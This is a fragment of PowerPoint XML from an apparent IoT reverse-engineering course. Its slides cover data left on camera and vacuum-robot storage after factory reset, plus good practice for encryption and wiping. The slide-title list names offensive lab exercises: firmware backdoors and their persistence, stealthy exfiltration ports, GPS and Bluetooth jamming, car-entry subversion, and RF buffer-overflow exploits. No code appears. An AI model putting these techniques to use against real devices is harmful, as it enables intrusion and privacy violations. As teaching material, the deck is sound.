              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Many models have same design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SOC: HI3518</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flash: 8MByte SPI NOR Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All devices use JFFS2/UBIFS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wi-Fi credentials can be recovered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No video due to SD card</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Grafik 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6E6413-0355-4F00-8852-CF4D34273BF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2694" y="3386932"/>
            <a:ext cx="5444955" cy="2974044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EC0796B-7B0B-4233-85F8-A1F68E4FD4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53350" y="1365389"/>
            <a:ext cx="3924299" cy="1902728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55550075-FFFD-834F-9051-5DF7F189A199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2066824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28ECC7-C2F9-422E-998E-815FD8F35865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="94585"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dark world of IoT storage: summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C45D16-3253-4A3B-AD55-9A36B0AC88E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333829" y="1454727"/>
            <a:ext cx="11248571" cy="5266749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good Practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use Trust Zone for key storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User data partitions should be encrypted using LUKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key managed handled by TEE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unlock configuration and user data at boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Factory reset should delete all key and data and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>recreatw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> partitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Summary: A lot of information can be recovered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure and correct factory reset is difficult to implement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use of raw NAND defeats full wipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There is no way to ensure that a device has been wiped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Many vendors do not erase all user generated data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Usage data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logfiles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wi-Fi configuration files were overwritten, but information remained in other places</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE89A058-7020-9F43-9C42-6A9C4BE82D1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194195963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15671</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>2119</Paragraphs>
  <Slides>178</Slides>
  <Notes>160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178</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="188" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Retrospect</vt:lpstr>
      <vt:lpstr>Internet of Things: Reverse Engineering Nuts and Bolts</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 1, beginning techniques</vt:lpstr>
      <vt:lpstr>IoT reverse engineering, hacking</vt:lpstr>
      <vt:lpstr>Getting to know the ecosystem</vt:lpstr>
      <vt:lpstr>Hardware components</vt:lpstr>
      <vt:lpstr>ARM Cortex M4</vt:lpstr>
      <vt:lpstr>Understanding circuit boards</vt:lpstr>
      <vt:lpstr>Software components</vt:lpstr>
      <vt:lpstr>Software processes and formats</vt:lpstr>
      <vt:lpstr>Software processes and formats</vt:lpstr>
      <vt:lpstr>Software processes and formats</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 2, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Breaking an IP Camera</vt:lpstr>
      <vt:lpstr>Breaking an IP Camera</vt:lpstr>
      <vt:lpstr>Breaking an IP Camera – details, 1</vt:lpstr>
      <vt:lpstr>Breaking an IP Camera – details, 2</vt:lpstr>
      <vt:lpstr>Breaking an IP Camera – details, 3</vt:lpstr>
      <vt:lpstr>Breaking an IP Camera – details, 4</vt:lpstr>
      <vt:lpstr>Install Qemu user binaries</vt:lpstr>
      <vt:lpstr>Qemu user binaries</vt:lpstr>
      <vt:lpstr>Cross compile programs for ARM</vt:lpstr>
      <vt:lpstr>Disassemble an ARM image</vt:lpstr>
      <vt:lpstr>Disassemble an ARM image - 1</vt:lpstr>
      <vt:lpstr>Disassemble an ARM image - 2</vt:lpstr>
      <vt:lpstr>Disassemble an ARM image - 3</vt:lpstr>
      <vt:lpstr>Disassemble an ARM image - 4</vt:lpstr>
      <vt:lpstr>Disassemble an ARM image - 5</vt:lpstr>
      <vt:lpstr>Disassemble an ARM image - 6</vt:lpstr>
      <vt:lpstr>Find keys in software, 1</vt:lpstr>
      <vt:lpstr>Find keys in software, 2</vt:lpstr>
      <vt:lpstr>Find keys in software, 3</vt:lpstr>
      <vt:lpstr>Find keys in software, 4</vt:lpstr>
      <vt:lpstr>Find keys in software, 5</vt:lpstr>
      <vt:lpstr>Find keys in software, 6</vt:lpstr>
      <vt:lpstr>Find keys in software, 7</vt:lpstr>
      <vt:lpstr>Find crypto in image --- more tricks</vt:lpstr>
      <vt:lpstr>Build your own security camera</vt:lpstr>
      <vt:lpstr>64 bit ARM (aarch64)</vt:lpstr>
      <vt:lpstr>64 bit ARM (aarch64)</vt:lpstr>
      <vt:lpstr>64 bit ARM (aarch64)</vt:lpstr>
      <vt:lpstr>64 bit ARM (aarch64)</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 3, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>MITM network traffic on router</vt:lpstr>
      <vt:lpstr>OpenWRT</vt:lpstr>
      <vt:lpstr>Selection of Router</vt:lpstr>
      <vt:lpstr>TP-Link AC1750</vt:lpstr>
      <vt:lpstr>Installing OpenWRT on TP-Link AC1750</vt:lpstr>
      <vt:lpstr>Exercises with OpenWRT, 1</vt:lpstr>
      <vt:lpstr>Exercises with OpenWRT, 2</vt:lpstr>
      <vt:lpstr>Exercises with OpenWRT, 3</vt:lpstr>
      <vt:lpstr>tcpdump</vt:lpstr>
      <vt:lpstr>sslstrip</vt:lpstr>
      <vt:lpstr>dnsmasq</vt:lpstr>
      <vt:lpstr>Reverse engineer firmware</vt:lpstr>
      <vt:lpstr>Binwalk (Ubuntu, Debian)</vt:lpstr>
      <vt:lpstr>Binwalk example</vt:lpstr>
      <vt:lpstr>Binwalk run-through</vt:lpstr>
      <vt:lpstr>Binwalk run-through</vt:lpstr>
      <vt:lpstr>Binwalk run-through</vt:lpstr>
      <vt:lpstr>Binwalk output</vt:lpstr>
      <vt:lpstr>Binwalk output</vt:lpstr>
      <vt:lpstr>Reverse engineer firmware</vt:lpstr>
      <vt:lpstr>Modifying Firmware</vt:lpstr>
      <vt:lpstr>Modifying Firmware (2)</vt:lpstr>
      <vt:lpstr>Backdoor code</vt:lpstr>
      <vt:lpstr>Emulate entire firmware package</vt:lpstr>
      <vt:lpstr>Scan firmware for vulnerabilities with firmwalker</vt:lpstr>
      <vt:lpstr>Map firmware update process</vt:lpstr>
      <vt:lpstr>Map firmware update process</vt:lpstr>
      <vt:lpstr>Map firmware update process</vt:lpstr>
      <vt:lpstr>Map firmware update process</vt:lpstr>
      <vt:lpstr>Map firmware update process</vt:lpstr>
      <vt:lpstr>Map firmware update process</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 4, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Monitor an I2C bus</vt:lpstr>
      <vt:lpstr>Arduino code</vt:lpstr>
      <vt:lpstr>Arduino code</vt:lpstr>
      <vt:lpstr>Desolder a ROM and extract contents</vt:lpstr>
      <vt:lpstr>Extracting ROM/Flash contents</vt:lpstr>
      <vt:lpstr>Interlude: the dark world of IoT device storage</vt:lpstr>
      <vt:lpstr>Storage on IoT devices</vt:lpstr>
      <vt:lpstr>Raw NAND flash</vt:lpstr>
      <vt:lpstr>Raw NAND flash properties</vt:lpstr>
      <vt:lpstr>Wear-leveling for NAND raw flash</vt:lpstr>
      <vt:lpstr>How wear-leveling works</vt:lpstr>
      <vt:lpstr>Block devices</vt:lpstr>
      <vt:lpstr>Access to deleted data</vt:lpstr>
      <vt:lpstr>Tools for raw NAND</vt:lpstr>
      <vt:lpstr>Analyzing NAND dumps</vt:lpstr>
      <vt:lpstr>NAND references</vt:lpstr>
      <vt:lpstr>Examples: Xiaomi/Rockrobo Mi Vacuum Robot</vt:lpstr>
      <vt:lpstr>Mi Vacuum Robot data extraction</vt:lpstr>
      <vt:lpstr>eMMC layout</vt:lpstr>
      <vt:lpstr>Mi Vacuum Robot reset</vt:lpstr>
      <vt:lpstr>Mi Vacuum Robot </vt:lpstr>
      <vt:lpstr>Mi Vacuum Robot: locate the former owner</vt:lpstr>
      <vt:lpstr>Other examples: MiTU Drone</vt:lpstr>
      <vt:lpstr>Door bells</vt:lpstr>
      <vt:lpstr>Dark world of IoT storage: summary</vt:lpstr>
      <vt:lpstr>JTAG</vt:lpstr>
      <vt:lpstr>JTAG example</vt:lpstr>
      <vt:lpstr>OpenOCD with badge</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 5, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Software Reverse Engineering with Ghidra</vt:lpstr>
      <vt:lpstr>Ghidra Example</vt:lpstr>
      <vt:lpstr>Exfiltrate data to known IP/port</vt:lpstr>
      <vt:lpstr>Build a nonstandard data exfiltration port</vt:lpstr>
      <vt:lpstr>Make the exfiltration port stealthy</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 6, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Reading and writing SD cards</vt:lpstr>
      <vt:lpstr>Look at an existing SD cards</vt:lpstr>
      <vt:lpstr>Look at an existing SD cards</vt:lpstr>
      <vt:lpstr>Do our sensor Arduino experiments on a Raspberry Pi</vt:lpstr>
      <vt:lpstr>Do our sensor Arduino experiments on a ESP32 platform</vt:lpstr>
      <vt:lpstr>Do our sensor Arduino experiments on a Mips platform</vt:lpstr>
      <vt:lpstr>Root a raspberry pi boot</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 7, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Introduce backdoor into embedded Linux build</vt:lpstr>
      <vt:lpstr>Make embedded Linux backdoor persistent</vt:lpstr>
      <vt:lpstr>Make embedded Linux backdoor persistent</vt:lpstr>
      <vt:lpstr>Fingerprint software components and get web info automatically</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 8, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Jam a GPS signal</vt:lpstr>
      <vt:lpstr>Extract information from side channel</vt:lpstr>
      <vt:lpstr>Effect a glitch on a pin</vt:lpstr>
      <vt:lpstr>Subvert car entry protocol</vt:lpstr>
      <vt:lpstr>Reverse engineer weather station link</vt:lpstr>
      <vt:lpstr>Interfere with 802.11 control channel</vt:lpstr>
      <vt:lpstr>Locate 802.11 source with coffee can antennas and an SDR</vt:lpstr>
      <vt:lpstr>Induce a buffer overflow via RF</vt:lpstr>
      <vt:lpstr>Turn RF buffer overflow into an exploit</vt:lpstr>
      <vt:lpstr>Build a mesh network on IoT devices</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 9, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Develop a backdoor for a 3D printer</vt:lpstr>
      <vt:lpstr>Use 3D printer backdoor to target a specific part build</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 10, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Collect common sensor readings and predict events</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 11, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 12, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Reverse engineer a consumer IoT device</vt:lpstr>
      <vt:lpstr>Develop a surreptitious channel from consumer IoT device</vt:lpstr>
      <vt:lpstr>Develop channel from consumer IoT appliance</vt:lpstr>
      <vt:lpstr>Develop a hardware sniffer on some interface or subsystem</vt:lpstr>
      <vt:lpstr>Fingerprint an IoT based emitter</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 13, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Use an SDR to subvert a garage door opening system</vt:lpstr>
      <vt:lpstr>Reverse engineer a IoT based car</vt:lpstr>
      <vt:lpstr>Reverse engineer a IoT based HVAC system</vt:lpstr>
      <vt:lpstr>Reverse engineer a IoT based entertainment system</vt:lpstr>
      <vt:lpstr>Reverse engineer a IoT based security system</vt:lpstr>
      <vt:lpstr>Reverse engineer a IoT based scientific instrument system</vt:lpstr>
      <vt:lpstr>Develop a sensor based attack on some control system</vt:lpstr>
      <vt:lpstr>Introduce a backdoor in an IoT based application</vt:lpstr>
      <vt:lpstr>Reverse engineering, part 14, implement IoT based attacks</vt:lpstr>
      <vt:lpstr>Bluetooth</vt:lpstr>
      <vt:lpstr>Decode/jam a Bluetooth channel</vt:lpstr>
      <vt:lpstr>Zigbee</vt:lpstr>
      <vt:lpstr>Decode/jam a Zigbee channel</vt:lpstr>
      <vt:lpstr>Capstone 1: Detect, mitigate or prevent each of the attacks in the labs</vt:lpstr>
      <vt:lpstr>Capstone 2: Protect against drone attacks</vt:lpstr>
      <vt:lpstr>Reverse engineering: summary</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Build an IoT Gateway</vt:lpstr>
      <vt:lpstr>License</vt:lpstr>
      <vt:lpstr>Router Exploitation</vt:lpstr>
      <vt:lpstr>Router Exploitation</vt:lpstr>
      <vt:lpstr>Router Exploitation</vt:lpstr>
      <vt:lpstr>Router Exploitation</vt:lpstr>
      <vt:lpstr>Router Exploitation</vt:lpstr>
      <vt:lpstr>More things to do</vt:lpstr>
      <vt:lpstr>KVM Qemu</vt:lpstr>
      <vt:lpstr>Simulate an embedded Linux image with Qemu</vt:lpstr>
      <vt:lpstr>Install safe control software on a drone</vt:lpstr>
      <vt:lpstr>Side channels</vt:lpstr>
      <vt:lpstr>Discovering side channels</vt:lpstr>
      <vt:lpstr>Fault injection</vt:lpstr>
      <vt:lpstr>DPA</vt:lpstr>
      <vt:lpstr>Discovering side channels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1201</cp:revision>
  <cp:lastPrinted>2019-10-21T22:00:37Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-22T19:21:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-30T18:18:24Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>